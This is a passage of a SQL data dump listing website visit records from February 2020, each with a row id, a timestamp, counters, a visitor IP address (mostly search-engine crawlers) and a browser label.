1581747552,2,2,0,0,'66.249.64.28','chrome'),(481372,1581747648,1,1,0,0,'207.46.13.202','other'),(481373,1581748244,1,1,0,0,'178.154.171.134','chrome'),(481374,1581748328,2,2,0,0,'178.154.171.127','chrome'),(481375,1581748522,1,1,0,0,'66.249.64.28','chrome'),(481376,1581748542,1,1,0,0,'66.249.64.26','chrome'),(481377,1581748711,2,2,0,0,'66.249.70.36','chrome'),(481378,1581748895,1,1,0,0,'91.196.178.41','chrome'),(481379,1581749096,1,1,0,0,'141.8.142.2','chrome'),(481380,1581749527,1,1,0,0,'91.196.178.42','chrome'),(481381,1581749802,1,1,0,0,'8.29.198.27','other'),(481382,1581749886,1,1,0,0,'66.249.64.28','chrome'),(481383,1581750290,1,1,0,0,'66.249.64.27','chrome'),(481384,1581750335,2,2,0,0,'66.249.64.26','chrome'),(481385,1581750360,5,5,0,0,'178.154.171.134','chrome'),(481386,1581750384,2,2,0,0,'178.154.171.134','other'),(481387,1581750782,1,1,0,0,'66.102.9.161','chrome'),(481388,1581750835,1,1,0,0,'207.46.13.231','other'),(481389,1581751662,2,2,0,0,'178.154.171.134','chrome'),(481390,1581751740,1,1,0,0,'66.249.64.28','chrome'),(481391,1581751785,1,1,0,0,'66.249.64.27','chrome'),(481392,1581751861,1,1,0,0,'207.46.13.202','other'),(481393,1581752120,2,2,0,0,'141.8.142.2','chrome'),(481394,1581752694,2,2,0,0,'178.154.171.127','chrome'),(481395,1581753046,1,1,0,0,'91.196.178.18','chrome'),(481396,1581753076,2,2,0,0,'66.249.70.33','chrome'),(481397,1581753108,1,1,0,0,'141.8.183.53','chrome'),(481398,1581753111,1,1,0,0,'141.8.142.2','chrome'),(481399,1581753188,1,1,0,0,'66.249.64.26','chrome'),(481400,1581753319,3,3,0,0,'66.249.64.27','chrome'),(481401,1581753515,2,1,1,0,'66.249.64.28',''),(481402,1581753559,1,1,0,0,'66.249.70.36','chrome'),(481403,1581753973,3,3,0,0,'178.154.171.134','chrome'),(481404,1581754032,2,2,0,0,'178.154.171.127','chrome'),(481405,1581754117,3,3,0,0,'66.249.70.33','chrome'),(481406,1581754154,1,1,0,0,'116.193.170.50','chrome'),(481407,1581754445,3,3,0,0,'66.249.64.28','chrome'),(481408,1581754548,1,1,0,0,'8.29.198.27','other'),(481409,1581754777,2,2,0,0,'66.249.64.26','chrome'),(481410,1581754898,3,3,0,0,'207.46.13.202','other'),(481411,1581754922,1,1,0,0,'66.249.64.27','chrome'),(481412,1581754968,1,1,0,0,'207.46.13.231','other'),(481413,1581754973,2,2,0,0,'207.46.13.130','other'),(481414,1581755172,1,1,0,0,'66.249.70.62','chrome'),(481415,1581755265,2,2,0,0,'178.154.171.134','chrome'),(481416,1581755550,1,1,0,0,'178.154.171.127','chrome'),(481417,1581756210,1,1,0,0,'66.249.70.33','chrome'),(481418,1581756925,2,2,0,0,'66.249.64.27','chrome'),(481419,1581757386,2,2,0,0,'178.154.171.127','chrome'),(481420,1581757661,1,1,0,0,'66.249.70.33','chrome'),(481421,1581757753,1,1,0,0,'178.154.171.134','other'),(481422,1581758045,1,1,0,0,'66.249.64.26','chrome'),(481423,1581758125,4,4,0,0,'66.249.64.27','chrome'),(481424,1581758409,1,1,0,0,'178.154.171.127','chrome'),(481425,1581758655,3,3,0,0,'66.249.64.28','chrome'),(481426,1581758749,1,1,0,0,'66.249.70.33','chrome'),(481427,1581758822,1,1,0,0,'37.9.113.10','chrome'),(481428,1581759028,1,1,0,0,'66.249.64.26','chrome'),(481429,1581759102,1,1,0,0,'207.46.13.130','other'),(481430,1581759188,1,1,0,0,'66.249.70.62','chrome'),(481431,1581759501,1,1,0,0,'141.8.188.12','chrome'),(481432,1581759523,1,1,0,0,'207.46.13.202','other'),(481433,1581759785,1,1,0,0,'141.8.183.100','chrome'),(481434,1581759830,2,2,0,0,'66.249.64.28','chrome'),(481435,1581759925,1,1,0,0,'141.8.142.161','chrome'),(481436,1581760135,1,1,0,0,'66.249.64.26','chrome'),(481437,1581760182,2,2,0,0,'66.249.70.36','chrome'),(481438,1581760773,2,2,0,0,'66.249.64.28','chrome'),(481439,1581760853,1,1,0,0,'66.249.70.33','chrome'),(481440,1581760968,1,1,0,0,'66.249.64.27','chrome'),(481441,1581760999,1,1,0,0,'8.29.198.26','other'),(481442,1581761350,1,1,0,0,'66.249.64.26','chrome'),(481443,1581761937,1,1,0,0,'95.108.213.55','chrome'),(481444,1581762202,1,1,0,0,'66.249.64.27','chrome'),(481445,1581762353,1,1,0,0,'178.154.171.134','chrome'),(481446,1581762470,1,1,0,0,'66.249.64.28','chrome'),(481447,1581762495,1,1,0,0,'95.108.181.104','chrome'),(481448,1581762519,1,1,0,0,'141.8.142.164','chrome'),(481449,1581762568,2,2,0,0,'5.45.207.49','chrome'),(481450,1581762757,3,3,0,0,'66.249.64.26','chrome'),(481451,1581762869,1,1,0,0,'141.8.132.12','chrome'),(481452,1581763241,1,1,0,0,'37.9.113.33','chrome'),(481453,1581763268,1,1,0,0,'141.8.183.111','chrome'),(481454,1581763323,1,1,0,0,'5.45.207.65','chrome'),(481455,1581763325,1,1,0,0,'141.8.142.50','chrome'),(481456,1581763409,1,1,0,0,'141.8.142.161','chrome'),(481457,1581763413,2,2,0,0,'66.249.64.28','chrome'),(481458,1581763883,1,1,0,0,'5.45.207.49','chrome'),(481459,1581764065,1,1,0,0,'178.154.171.134','chrome'),(481460,1581764149,1,1,0,0,'207.46.13.231','other'),(481461,1581764523,2,2,0,0,'178.154.171.127','chrome'),(481462,1581764868,1,1,0,0,'66.249.64.26','chrome'),(481463,1581764983,1,1,0,0,'141.8.142.2','chrome'),(481464,1581765006,4,4,0,0,'66.249.64.27','chrome'),(481465,1581765394,2,2,0,0,'66.249.64.28','chrome'),(481466,1581765609,1,1,0,0,'8.29.198.25','other'),(481467,1581765795,3,3,0,0,'178.154.171.134','chrome'),(481468,1581765906,4,4,0,0,'66.249.64.26','chrome'),(481469,1581765971,1,1,0,0,'66.249.70.36','chrome'),(481470,1581766504,1,1,0,0,'66.249.64.28','chrome'),(481471,1581767030,2,2,0,0,'66.249.64.26','chrome'),(481472,1581767085,3,3,0,0,'178.154.171.127','chrome'),(481473,1581767747,1,1,0,0,'185.53.79.220','chrome'),(481474,1581767762,1,1,0,0,'207.46.13.202','other'),(481475,1581767978,1,1,0,0,'109.74.154.72','chrome'),(481476,1581768564,2,2,0,0,'178.154.171.127','chrome'),(481477,1581768623,1,1,0,0,'178.154.171.134','chrome'),(481478,1581768735,1,1,0,0,'31.13.127.3','other'),(481479,1581769517,1,1,0,0,'207.46.13.231','other'),(481480,1581770043,1,1,0,0,'178.154.171.134','chrome'),(481481,1581770204,1,1,0,0,'178.154.171.127','chrome'),(481482,1581771315,2,2,0,0,'178.154.171.134','other'),(481483,1581771696,1,0,1,0,'207.46.13.231',''),(481484,1581771923,1,1,0,0,'91.196.178.163','chrome'),(481485,1581772025,1,1,0,0,'8.29.198.25','other'),(481486,1581772394,1,1,0,0,'66.249.64.27','chrome'),(481487,1581772431,2,2,0,0,'66.249.64.26','chrome'),(481488,1581772730,1,1,0,0,'178.154.171.127','other'),(481489,1581772746,1,1,0,0,'66.249.70.36','chrome'),(481490,1581773185,1,1,0,0,'141.8.142.2','chrome'),(481491,1581773485,1,1,0,0,'87.250.224.90','chrome'),(481492,1581773613,1,1,0,0,'66.249.64.27','chrome'),(481493,1581773702,1,1,0,0,'95.108.181.104','chrome'),(481494,1581773736,1,1,0,0,'178.154.171.134','chrome'),(481495,1581774194,1,0,1,0,'66.249.64.28',''),(481496,1581774527,1,1,0,0,'66.249.64.28','chrome'),(481497,1581774584,1,1,0,0,'178.154.171.127','chrome'),(481498,1581774633,1,1,0,0,'141.8.183.73','chrome'),(481499,1581774653,1,1,0,0,'207.46.13.202','other'),(481500,1581774712,1,1,0,0,'66.249.64.26','chrome'),(481501,1581774723,1,1,0,0,'141.8.142.2','chrome'),(481502,1581774753,1,1,0,0,'94.130.9.183','other'),(481503,1581774786,2,2,0,0,'178.154.171.134','other'),(481504,1581775601,3,3,0,0,'178.154.171.134','chrome'),(481505,1581776007,1,1,0,0,'66.249.64.27','chrome'),(481506,1581776011,1,1,0,0,'66.249.64.26','chrome'),(481507,1581776569,1,1,0,0,'8.29.198.27','other'),(481508,1581776796,2,2,0,0,'207.46.13.231','other'),(481509,1581776853,1,1,0,0,'207.46.13.130','other'),(481510,1581777034,1,1,0,0,'178.154.171.66','other'),(481511,1581777128,3,3,0,0,'178.154.171.134','chrome'),(481512,1581777274,1,1,0,0,'212.7.222.110','msie'),(481513,1581777471,1,1,0,0,'141.8.142.2','chrome'),(481514,1581777638,1,1,0,0,'178.154.171.134','other'),(481515,1581777859,2,2,0,0,'178.154.171.127','chrome'),(481516,1581777861,1,1,0,0,'66.249.70.36','chrome'),(481517,1581777900,1,1,0,0,'207.46.13.130','other'),(481518,1581778303,1,1,0,0,'66.249.70.33','chrome'),(481519,1581778350,2,2,0,0,'66.249.64.26','chrome'),(481520,1581778561,1,1,0,0,'91.196.178.28','chrome'),(481521,1581778778,2,2,0,0,'66.249.64.28','chrome'),(481522,1581778916,2,2,0,0,'178.154.171.127','chrome'),(481523,1581778949,1,1,0,0,'141.8.142.2','other'),(481524,1581779003,1,1,0,0,'66.249.70.36','chrome'),(481525,1581779330,1,1,0,0,'178.154.171.134','other'),(481526,1581779332,1,1,0,0,'37.9.113.10','other'),(481527,1581779333,1,1,0,0,'207.46.13.130','other'),(481528,1581779482,1,1,0,0,'66.249.64.27','chrome'),(481529,1581779551,3,3,0,0,'66.249.64.26','chrome'),(481530,1581779994,1,1,0,0,'37.9.113.163','chrome'),(481531,1581780099,1,1,0,0,'178.154.171.134','chrome'),(481532,1581780538,1,1,0,0,'66.249.70.33','chrome'),(481533,1581780613,1,1,0,0,'178.154.171.127','chrome'),(481534,1581780665,1,1,0,0,'66.249.64.27','chrome'),(481535,1581780976,2,2,0,0,'66.249.64.28','chrome'),(481536,1581781036,1,1,0,0,'141.8.183.73','chrome'),(481537,1581781573,2,2,0,0,'207.46.13.231','other'),(481538,1581781641,1,1,0,0,'31.13.127.7','other'),(481539,1581781642,1,1,0,0,'31.13.127.8','other'),(481543,1581781661,1,1,0,0,'178.154.171.134','chrome'),(481544,1581781695,2,2,0,0,'178.154.171.127','other'),(481545,1581781814,1,1,0,0,'207.46.13.130','other'),(481546,1581781896,1,1,0,0,'141.8.183.73','other'),(481547,1581782482,1,1,0,0,'141.8.142.164','chrome'),(481548,1581782525,1,1,0,0,'178.154.171.134','other'),(481549,1581782554,2,2,0,0,'66.249.64.26','chrome'),(481550,1581782947,1,1,0,0,'89.163.242.241','opera'),(481551,1581783029,1,1,0,0,'8.29.198.27','other'),(481552,1581783359,2,2,0,0,'207.46.13.231','other'),(481553,1581783635,2,2,0,0,'66.249.64.26','chrome'),(481554,1581783733,2,2,0,0,'66.249.64.27','chrome'),(481555,1581783788,3,3,0,0,'66.249.64.28','chrome'),(481556,1581783913,1,1,0,0,'37.9.113.10','chrome'),(481557,1581784298,1,1,0,0,'178.154.171.134','chrome'),(481558,1581784636,1,1,0,0,'207.46.13.231','other'),(481559,1581784802,1,1,0,0,'178.154.171.127','chrome'),(481560,1581785003,2,2,0,0,'66.249.64.28','chrome'),(481561,1581785169,1,1,0,0,'66.249.64.27','chrome'),(481562,1581785210,1,1,0,0,'178.154.171.134','chrome'),(481563,1581785275,1,1,0,0,'66.249.70.36','chrome'),(481564,1581785293,2,1,1,0,'66.249.64.26',''),(481565,1581785315,1,1,0,0,'66.249.70.33','chrome'),(481566,1581786330,5,5,0,0,'66.249.64.27','chrome'),(481567,1581786481,2,2,0,0,'207.46.13.202','other'),(481568,1581786646,2,2,0,0,'66.249.64.28','chrome'),(481569,1581786717,2,2,0,0,'91.196.121.154','chrome'),(481570,1581786733,2,2,0,0,'66.249.64.26','chrome'),(481571,1581786945,1,1,0,0,'178.154.171.134','chrome'),(481572,1581787526,1,1,0,0,'8.29.198.25','other'),(481573,1581787739,1,1,0,0,'178.154.171.134','other'),(481574,1581788539,2,2,0,0,'66.249.64.26','chrome'),(481575,1581788648,1,1,0,0,'141.8.183.15','chrome'),(481576,1581788788,1,1,0,0,'178.154.171.134','chrome'),(481577,1581789434,1,1,0,0,'207.46.13.130','other'),(481578,1581789726,2,2,0,0,'66.249.64.26','chrome'),(481579,1581789860,1,1,0,0,'66.249.70.36','chrome'),(481580,1581789874,1,1,0,0,'66.249.70.62','chrome'),(481581,1581789903,2,2,0,0,'66.249.64.28','chrome'),(481582,1581790155,2,2,0,0,'178.154.171.134','other'),(481583,1581790224,1,1,0,0,'141.8.142.2','chrome'),(481584,1581790451,2,2,0,0,'207.46.13.130','other'),(481585,1581790486,1,1,0,0,'91.196.178.28','chrome'),(481586,1581791017,1,1,0,0,'66.249.64.26','chrome'),(481587,1581791187,6,6,0,0,'66.249.64.28','chrome'),(481588,1581791403,1,1,0,0,'178.154.171.127','other'),(481589,1581791561,1,1,0,0,'66.249.70.62','chrome'),(481590,1581791756,1,1,0,0,'178.154.171.127','chrome'),(481591,1581791776,1,0,1,0,'207.46.13.231',''),(481592,1581791870,1,1,0,0,'141.8.183.73','chrome'),(481593,1581791926,1,1,0,0,'178.154.171.134','chrome'),(481594,1581791991,1,1,0,0,'178.154.171.134','other'),(481595,1581792228,1,1,0,0,'66.249.64.26','chrome'),(481596,1581792265,1,1,0,0,'207.46.13.202','other'),(481597,1581792516,1,1,0,0,'66.249.70.62','chrome'),(481598,1581792519,1,1,0,0,'66.249.70.33','chrome'),(481599,1581792665,2,2,0,0,'207.46.13.231','other'),(481600,1581793091,1,1,0,0,'66.249.70.36','chrome'),(481601,1581793234,1,1,0,0,'207.46.13.130','other'),(481602,1581793774,1,1,0,0,'66.249.64.28','chrome'),(481603,1581793979,1,1,0,0,'178.154.171.127','chrome'),(481604,1581794048,1,1,0,0,'8.29.198.26','other'),(481605,1581794285,1,0,1,0,'66.249.64.27',''),(481606,1581794556,2,1,1,0,'66.249.64.26',''),(481607,1581795085,2,2,0,0,'207.46.13.130','other'),(481608,1581795185,1,1,0,0,'207.46.13.202','other'),(481609,1581795330,1,1,0,0,'207.46.13.231','other'),(481610,1581795340,1,1,0,0,'66.249.64.28','chrome'),(481611,1581795390,3,3,0,0,'35.188.139.241','chrome'),(481612,1581795536,1,1,0,0,'141.8.142.2','chrome'),(481613,1581795547,3,3,0,0,'66.249.64.27','chrome'),(481614,1581795644,3,3,0,0,'35.225.32.27','chrome'),(481615,1581795662,3,3,0,0,'35.225.219.130','chrome'),(481616,1581795678,3,3,0,0,'35.222.149.146','chrome'),(481617,1581795746,1,1,0,0,'66.249.70.33','chrome'),(481618,1581796581,3,3,0,0,'66.249.64.27','chrome'),(481619,1581796592,1,1,0,0,'66.249.70.36','chrome'),(481620,1581796612,2,2,0,0,'66.249.64.26','chrome'),(481621,1581796709,1,1,0,0,'87.250.224.90','other'),(481622,1581796835,1,1,0,0,'66.249.64.28','chrome'),(481623,1581796864,1,1,0,0,'66.249.70.62','chrome'),(481624,1581796907,1,1,0,0,'207.46.13.231','other'),(481625,1581797090,1,1,0,0,'178.154.171.127','chrome'),(481626,1581797282,1,1,0,0,'178.154.171.134','chrome'),(481627,1581797357,1,1,0,0,'178.154.171.134','other'),(481628,1581798528,1,1,0,0,'8.29.198.26','other'),(481629,1581798586,2,2,0,0,'66.249.64.28','chrome'),(481630,1581798614,5,5,0,0,'66.249.64.27','chrome'),(481631,1581798693,3,3,0,0,'207.46.13.231','other'),(481632,1581798848,2,2,0,0,'66.249.70.36','chrome'),(481633,1581798929,1,1,0,0,'207.46.13.202','other'),(481634,1581798937,3,3,0,0,'66.249.64.26','chrome'),(481635,1581798977,1,1,0,0,'178.154.171.127','chrome'),(481636,1581800183,5,5,0,0,'66.249.64.26','chrome'),(481637,1581800248,1,1,0,0,'207.46.13.130','other'),(481638,1581800314,2,2,0,0,'178.154.171.127','chrome'),(481639,1581800660,3,3,0,0,'66.249.70.62','chrome'),(481640,1581800813,1,1,0,0,'141.8.183.73','chrome'),(481641,1581800864,4,4,0,0,'66.249.64.27','chrome'),(481642,1581800977,2,2,0,0,'66.249.64.28','chrome'),(481643,1581801159,1,1,0,0,'207.46.13.130','other'),(481644,1581801286,2,2,0,0,'66.249.64.26','chrome'),(481645,1581801652,1,1,0,0,'87.250.224.90','chrome'),(481646,1581802373,1,1,0,0,'178.154.171.134','other'),(481647,1581803399,4,4,0,0,'66.249.64.27','chrome'),(481648,1581803415,2,2,0,0,'66.249.64.26','chrome'),(481649,1581803438,1,1,0,0,'66.249.70.36','chrome'),(481650,1581803617,1,1,0,0,'141.8.142.161','other'),(481651,1581803711,1,1,0,0,'207.46.13.231','other'),(481652,1581803815,2,2,0,0,'178.154.171.127','chrome'),(481653,1581803886,3,3,0,0,'178.154.171.134','other'),(481654,1581804451,1,1,0,0,'178.154.171.127','other'),(481655,1581804523,1,1,0,0,'141.8.142.2','chrome'),(481656,1581804740,1,1,0,0,'207.46.13.202','other'),(481657,1581804807,3,3,0,0,'66.249.64.28','chrome'),(481658,1581805014,1,1,0,0,'8.29.198.27','other'),(481659,1581805085,2,2,0,0,'178.154.171.134','chrome'),(481660,1581805126,1,1,0,0,'178.154.171.134','other'),(481661,1581805642,4,4,0,0,'66.249.64.27','chrome'),(481662,1581805728,1,1,0,0,'66.249.64.28','chrome'),(481663,1581805746,1,1,0,0,'37.9.113.10','chrome'),(481664,1581805861,1,1,0,0,'31.13.127.23','other'),(481665,1581805906,1,1,0,0,'176.14.207.127','chrome'),(481666,1581806477,1,1,0,0,'207.46.13.231','other'),(481667,1581806562,1,1,0,0,'178.154.171.134','other'),(481668,1581806777,1,1,0,0,'66.249.64.28','chrome'),(481669,1581807124,1,1,0,0,'66.249.70.36','chrome'),(481670,1581807283,1,1,0,0,'141.8.183.73','chrome'),(481671,1581807451,1,1,0,0,'207.46.13.231','other'),(481672,1581808076,1,1,0,0,'178.154.171.127','chrome'),(481673,1581808247,1,1,0,0,'66.249.64.27','chrome'),(481674,1581808271,1,1,0,0,'66.249.70.33','chrome'),(481675,1581808392,1,1,0,0,'66.249.64.28','chrome'),(481676,1581808396,1,1,0,0,'207.46.13.231','other'),(481677,1581808726,1,1,0,0,'178.154.171.134','other'),(481678,1581809358,1,1,0,0,'207.46.13.202','other'),(481679,1581809371,3,3,0,0,'66.249.64.26','chrome'),(481680,1581809480,1,1,0,0,'8.29.198.27','other'),(481681,1581809492,1,1,0,0,'66.249.70.36','chrome'),(481682,1581809675,1,1,0,0,'66.249.64.27','chrome'),(481683,1581809695,1,1,0,0,'207.46.13.231','other'),(481684,1581809821,3,3,0,0,'178.154.171.134','chrome'),(481685,1581809869,1,1,0,0,'3.94.193.229','chrome'),(481686,1581810082,1,1,0,0,'157.55.39.241','other'),(481687,1581810635,1,0,1,0,'66.249.64.26',''),(481688,1581810865,1,1,0,0,'66.249.70.36','chrome'),(481689,1581811033,1,0,1,0,'66.249.64.27',''),(481690,1581811298,2,2,0,0,'66.249.64.27','chrome'),(481691,1581811358,1,1,0,0,'178.154.171.127','chrome'),(481692,1581811606,3,3,0,0,'66.249.64.26','chrome'),(481693,1581811723,1,1,0,0,'91.196.178.41','chrome'),(481694,1581811730,1,1,0,0,'66.249.64.28','chrome'),(481695,1581811835,1,1,0,0,'178.154.171.127','other'),(481696,1581811955,1,1,0,0,'207.46.13.231','other'),(481697,1581812674,1,1,0,0,'141.8.132.37','chrome'),(481698,1581812907,1,1,0,0,'207.46.13.202','other'),(481699,1581812981,1,1,0,0,'5.255.253.8','other'),(481700,1581813049,1,1,0,0,'66.249.64.27','chrome'),(481701,1581813139,1,1,0,0,'141.8.183.53','chrome'),(481702,1581813234,1,1,0,0,'178.154.171.134','chrome'),(481703,1581813255,1,1,0,0,'207.46.13.231','other'),(481704,1581813377,1,1,0,0,'66.249.64.28','chrome'),(481705,1581813390,1,1,0,0,'141.8.142.2','other'),(481706,1581813395,1,1,0,0,'37.9.113.10','other'),(481707,1581813415,4,4,0,0,'66.249.64.26','chrome'),(481708,1581813506,1,1,0,0,'141.8.142.119','chrome'),(481709,1581813509,1,1,0,0,'141.8.132.2','chrome'),(481710,1581813651,1,1,0,0,'37.9.113.33','chrome'),(481711,1581813666,1,1,0,0,'157.55.39.241','other'),(481712,1581814176,2,2,0,0,'66.249.64.27','chrome'),(481713,1581814514,1,1,0,0,'62.205.134.182','other'),(481714,1581814819,1,1,0,0,'141.8.183.33','other'),(481715,1581814895,1,1,0,0,'5.45.207.49','other'),(481716,1581815724,2,2,0,0,'66.249.70.62','chrome'),(481717,1581815899,1,1,0,0,'178.154.171.127','other'),(481718,1581815978,1,1,0,0,'8.29.198.26','other'),(481719,1581816039,3,3,0,0,'178.154.171.134','other'),(481720,1581816083,1,1,0,0,'66.249.64.27','chrome'),(481721,1581816450,1,1,0,0,'66.249.64.28','chrome'),(481722,1581816645,1,1,0,0,'66.249.70.33','chrome'),(481723,1581816863,1,1,0,0,'66.249.64.26','chrome'),(481724,1581817588,1,1,0,0,'178.154.171.127','other'),(481725,1581817690,1,1,0,0,'66.249.64.27','chrome'),(481726,1581817808,1,0,1,0,'66.249.64.28',''),(481727,1581817838,1,1,0,0,'66.249.70.62','chrome'),(481728,1581818355,1,1,0,0,'178.154.171.134','other'),(481729,1581818392,1,1,0,0,'207.46.13.202','other'),(481730,1581818406,1,1,0,0,'178.154.171.127','chrome'),(481731,1581818510,1,1,0,0,'141.8.142.2','chrome'),(481732,1581818587,1,1,0,0,'66.249.64.28','chrome'),(481733,1581818850,1,1,0,0,'207.46.13.231','other'),(481734,1581819028,2,2,0,0,'66.249.70.62','chrome'),(481735,1581819373,1,1,0,0,'178.154.171.134','chrome'),(481736,1581819447,1,1,0,0,'95.108.213.55','other'),(481737,1581819450,1,1,0,0,'95.108.213.3','other'),(481738,1581819531,1,1,0,0,'66.249.64.26','chrome'),(481739,1581820207,1,1,0,0,'141.8.142.2','chrome'),(481740,1581820212,1,1,0,0,'66.249.64.28','chrome'),(481741,1581820389,1,1,0,0,'66.249.64.27','chrome'),(481742,1581820424,1,1,0,0,'8.29.198.26','other'),(481743,1581821288,1,1,0,0,'141.8.183.111','chrome'),(481744,1581821415,3,3,0,0,'66.249.64.27','chrome'),(481745,1581821948,1,1,0,0,'178.159.37.88','chrome'),(481746,1581821957,1,1,0,0,'66.249.64.26','chrome'),(481747,1581822168,1,1,0,0,'198.27.70.196','other'),(481748,1581822172,1,1,0,0,'66.249.64.28','chrome'),(481749,1581822357,1,1,0,0,'178.154.171.134','chrome'),(481750,1581822482,1,1,0,0,'178.154.171.127','other'),(481751,1581822523,1,1,0,0,'207.46.13.231','other'),(481752,1581822637,1,1,0,0,'37.9.113.10','other'),(481753,1581822933,1,1,0,0,'66.249.70.33','chrome'),(481754,1581822943,1,1,0,0,'178.154.171.134','other'),(481755,1581823788,2,2,0,0,'178.154.171.127','chrome'),(481756,1581824372,1,1,0,0,'66.249.64.28','chrome'),(481757,1581824524,1,1,0,0,'66.249.64.27','chrome'),(481758,1581824761,2,2,0,0,'178.154.171.127','chrome'),(481759,1581824766,1,1,0,0,'178.154.171.134','chrome'),(481760,1581825101,1,1,0,0,'178.154.171.134','other'),(481761,1581825689,1,1,0,0,'66.249.64.28','chrome'),(481762,1581826041,1,1,0,0,'178.154.171.134','chrome'),(481763,1581826064,1,1,0,0,'66.249.64.26','chrome'),(481764,1581826146,1,1,0,0,'207.46.13.202','other'),(481765,1581826655,2,2,0,0,'178.154.171.134','other'),(481766,1581826817,1,1,0,0,'66.249.64.28','chrome'),(481767,1581826950,1,1,0,0,'66.249.64.27','chrome'),(481768,1581826963,1,1,0,0,'8.29.198.25','other'),(481769,1581827612,1,1,0,0,'178.154.171.134','chrome'),(481770,1581829165,1,1,0,0,'207.46.13.202','other'),(481771,1581829258,1,1,0,0,'178.154.171.127','other'),(481772,1581829263,1,1,0,0,'66.249.64.26','chrome'),(481773,1581829461,2,2,0,0,'66.249.64.28','chrome'),(481774,1581829668,1,1,0,0,'66.249.70.33','chrome'),(481775,1581830785,1,1,0,0,'178.154.171.134','other'),(481776,1581830842,1,1,0,0,'66.249.64.26','chrome'),(481777,1581831212,1,1,0,0,'104.245.145.124','chrome'),(481778,1581831360,1,1,0,0,'8.29.198.27','other'),(481779,1581831450,1,1,0,0,'66.249.70.36','chrome'),(481780,1581831532,2,2,0,0,'66.249.64.28','chrome'),(481781,1581831544,3,3,0,0,'66.249.64.27','chrome'),(481782,1581831560,1,1,0,0,'62.205.134.182','other'),(481783,1581831947,1,1,0,0,'141.8.142.2','chrome'),(481784,1581832185,1,1,0,0,'178.154.171.134','chrome'),(481785,1581832339,2,2,0,0,'178.154.171.134','other'),(481786,1581833069,2,2,0,0,'66.249.64.28','chrome'),(481787,1581833217,1,1,0,0,'66.249.70.33','chrome'),(481788,1581833865,1,1,0,0,'91.196.121.154','chrome'),(481789,1581833974,1,1,0,0,'66.249.64.26','chrome'),(481790,1581834820,4,4,0,0,'66.249.64.27','chrome'),(481791,1581835086,3,3,0,0,'66.249.64.26','chrome'),(481792,1581835429,1,1,0,0,'141.8.142.2','chrome'),(481793,1581836424,2,2,0,0,'66.249.64.27','chrome'),(481794,1581836447,2,2,0,0,'66.249.64.26','chrome'),(481795,1581836794,1,1,0,0,'66.249.70.36','chrome'),(481796,1581837016,2,2,0,0,'66.249.64.28','chrome'),(481797,1581837042,3,3,0,0,'178.154.171.127','chrome'),(481798,1581837193,1,1,0,0,'31.13.103.11','other'),(481799,1581837194,1,1,0,0,'31.13.103.9','other'),(481800,1581837232,1,1,0,0,'178.154.171.127','other'),(481801,1581837235,1,1,0,0,'178.154.171.134','chrome'),(481802,1581837279,1,1,0,0,'176.103.56.200','chrome'),(481803,1581837931,1,1,0,0,'8.29.198.26','other'),(481804,1581838331,4,4,0,0,'66.249.64.28','chrome'),(481805,1581838526,3,3,0,0,'66.249.64.27','chrome'),(481806,1581838635,1,1,0,0,'178.154.171.127','chrome'),(481807,1581839097,3,3,0,0,'178.154.171.134','other'),(481808,1581839164,1,1,0,0,'178.154.171.134','chrome'),(481809,1581839392,1,1,0,0,'185.230.242.3','other'),(481810,1581839657,3,3,0,0,'178.154.171.127','chrome'),(481811,1581839731,3,3,0,0,'66.249.64.27','chrome'),(481812,1581839871,1,1,0,0,'66.249.64.26','chrome'),(481813,1581840201,1,1,0,0,'178.154.171.134','other'),(481814,1581840227,3,3,0,0,'66.249.64.28','chrome'),(481815,1581840645,2,2,0,0,'178.154.171.127','other'),(481816,1581840725,1,1,0,0,'66.249.64.27','chrome'),(481817,1581840897,2,2,0,0,'66.249.70.33','chrome'),(481818,1581841337,3,3,0,0,'207.46.13.202','other'),(481819,1581841789,1,1,0,0,'178.154.171.134','other'),(481820,1581842005,1,1,0,0,'66.249.64.28','chrome'),(481821,1581842032,2,2,0,0,'66.249.64.26','chrome'),(481822,1581842060,2,2,0,0,'141.8.142.2','chrome'),(481823,1581842097,1,1,0,0,'178.154.171.127','chrome'),(481824,1581842299,1,1,0,0,'8.29.198.27','other'),(481825,1581842333,1,1,0,0,'178.154.171.134','chrome'),(481826,1581842761,1,1,0,0,'66.249.70.33','chrome'),(481827,1581843005,1,1,0,0,'157.55.39.241','other'),(481828,1581843085,2,2,0,0,'66.249.64.27','chrome'),(481829,1581843410,1,1,0,0,'193.106.30.99','firefox'),(481830,1581843463,2,2,0,0,'66.249.64.26','chrome'),(481831,1581843836,1,1,0,0,'207.46.13.202','other'),(481832,1581843908,1,1,0,0,'178.154.171.134','other'),(481833,1581843963,1,1,0,0,'66.249.64.28','chrome'),(481834,1581844541,1,1,0,0,'66.249.64.27','chrome'),(481835,1581844887,1,1,0,0,'178.154.171.127','chrome'),(481836,1581845238,1,1,0,0,'66.249.70.62','chrome'),(481837,1581845281,2,1,1,0,'66.249.64.28',''),(481838,1581845566,2,2,0,0,'66.249.64.27','chrome'),(481839,1581845714,2,2,0,0,'66.249.64.28','chrome'),(481840,1581846030,1,1,0,0,'66.249.70.33','chrome'),(481841,1581846056,1,1,0,0,'178.154.171.134','chrome'),(481842,1581847332,3,3,0,0,'178.154.171.127','chrome'),(481843,1581847418,2,1,1,0,'66.249.64.28',''),(481844,1581847592,2,2,0,0,'178.154.171.134','other'),(481845,1581847899,1,1,0,0,'178.154.171.127','other'),(481846,1581848456,1,0,1,0,'66.249.64.28',''),(481847,1581848464,1,1,0,0,'66.249.70.36','chrome'),(481848,1581848487,1,1,0,0,'66.249.64.26','chrome'),(481849,1581848890,1,1,0,0,'8.29.198.25','other'),(481850,1581849060,3,3,0,0,'66.249.64.27','chrome'),(481851,1581849133,1,1,0,0,'178.154.171.127','chrome'),(481852,1581849306,2,2,0,0,'66.249.64.28','chrome'),(481853,1581849415,1,1,0,0,'141.8.183.111','chrome'),(481854,1581849440,1,1,0,0,'141.8.142.2','other'),(481855,1581849567,1,1,0,0,'157.55.39.241','other'),(481856,1581850057,5,5,0,0,'178.154.171.134','other'),(481857,1581850387,1,1,0,0,'66.249.70.62','chrome'),(481858,1581850542,4,4,0,0,'66.249.64.27','chrome'),(481859,1581850730,1,1,0,0,'178.154.171.127','chrome'),(481860,1581851050,1,1,0,0,'66.249.70.36','chrome'),(481861,1581851288,2,2,0,0,'66.249.64.26','chrome'),(481862,1581851393,3,3,0,0,'66.249.70.62','chrome'),(481863,1581851584,3,3,0,0,'66.249.64.27','chrome'),(481864,1581851951,2,2,0,0,'66.249.70.33','chrome'),(481865,1581852215,1,1,0,0,'37.9.113.10','chrome'),(481866,1581852529,3,3,0,0,'66.249.64.28','chrome'),(481867,1581852552,1,1,0,0,'178.154.171.134','chrome'),(481868,1581852665,2,2,